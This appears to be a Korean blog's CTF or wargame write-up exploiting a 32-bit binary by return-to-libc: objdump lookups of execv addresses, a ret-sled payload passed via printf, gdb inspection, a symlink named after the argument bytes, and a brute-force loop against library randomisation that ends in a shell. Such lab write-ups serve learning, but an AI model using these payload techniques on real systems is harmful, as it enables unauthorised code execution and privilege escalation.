비닥이 블로그

[warmup100@padocon ~]$ ldd exploitme
        linux-gate.so.1 =>  (0x00b00000)
        libc.so.6 => /lib/libc.so.6 (0x007b4000)
        /lib/ld-linux.so.2 (0x00792000)

[warmup100@padocon ~]$ objdump -T /lib/libc.so.6 |grep -w execve
00850040  w   DF .text  00000053  GLIBC_2.0   execve

[warmup100@padocon ~]$ objdump -d exploitme | grep ret
 80482c3:       c3                      ret
 8048395:       c3                      ret
 80483c3:       c3                      ret
 80483e7:       c3                      ret
 80483f4:       c3                      ret
 8048459:       c3                      ret
 804845d:       c3                      ret
 804848a:       c3                      ret
 80484a7:       c3                      ret
***************************
execve = 00850040
execv = 008501a0
execl = 00850330
**************************
일단  execv를 이용하기로 하고.....

gdb를 실행하고

(gdb) r AAAABBBB`printf "\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xa0\x01\x85"`

다음 execv랑 execve에 브포를 걸고..

execv함수에 쓰이는 인자값 위치를 찾아야 하는데 요건 로그가 없어서 패스;; tril100참조하세요.
일단 찾은 주소는

0x8914ec83
0x0ca165c6

그리고 이걸 가지고 심볼릭 링크를걸고 실행을 하면!

[warmup100@padocon tmp]$ ./nve AAAABBBB`printf "\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xa0\x01\x85"`
sh-4.0$ id
uid=501(warmup100) gid=502(boom100) groups=501(warmup100) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.0$ exit
exit
[warmup100@padocon tmp]$

[tril100@cnuhansa nv]$ objdump -d nve | grep ret
 80482c3:       c3                      ret
 8048395:       c3                      ret
 80483c3:       c3                      ret
 80483e7:       c3                      ret
 80483f4:       c3                      ret
 8048459:       c3                      ret
 804845d:       c3                      ret
 804848a:       c3                      ret
 80484a7:       c3                      ret

[tril100@cnuhansa nv]$ objdump -T /lib/libc.so.6 | grep -w execv
0009c1a0 g    DF .text  00000034  GLIBC_2.0   execv

execv = 0x001ac1a0

(gdb) r AAAABBBB`printf "\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xa0\xc1\x1a"`

(gdb) c
Continuing.

Breakpoint 2, 0x001ac040 in execve () from /lib/libc.so.6
(gdb) c
Continuing.

Breakpoint 8, 0x001ac05d in execve () from /lib/libc.so.6

(gdb) x/20 $esp+0x0c
0xbffff694:     0x00869365      0x0087aa98      0xbffff730      0x00280ff4
0xbffff6a4:     0xbffff6e0      0x00869365      0x0087aa98      0xb7fff6a8
0xbffff6b4:     0x00280ff4      0x00000000      0x00000000      0xbffff6f8
0xbffff6c4:     0xb2727ee9      0x69498996      0x00000000      0x00000000
0xbffff6d4:     0x00000000      0x00000002      0x08048310      0x00000000

(gdb) x 0x00869365
0x869365 <_dl_fixup+197>:       0x8914ec83
(gdb)
0x869369 <_dl_fixup+201>:       0x0ca165c6
(gdb)
0x86936d <_dl_fixup+205>:       0x85000000

[tril100@cnuhansa nv]$ ln -s q `printf "\x83\xec\x14\x89\xc6\x65\xa1\x0c"`

랜덤 라이브러리라 브포로....
[tril100@cnuhansa nv]$ while [ 1 ] ; do ./nve AAAABBBB`printf "\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xe7\x83\x04\x08\xa0\xc1\x1a"`; done
세그멘테ì
             세그멘테ì
                          세그멘테ì
                                       세그멘테ì
                                                    sh-4.0$ id
uid=506(tril100) gid=503(boom100) groups=506(tril100) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023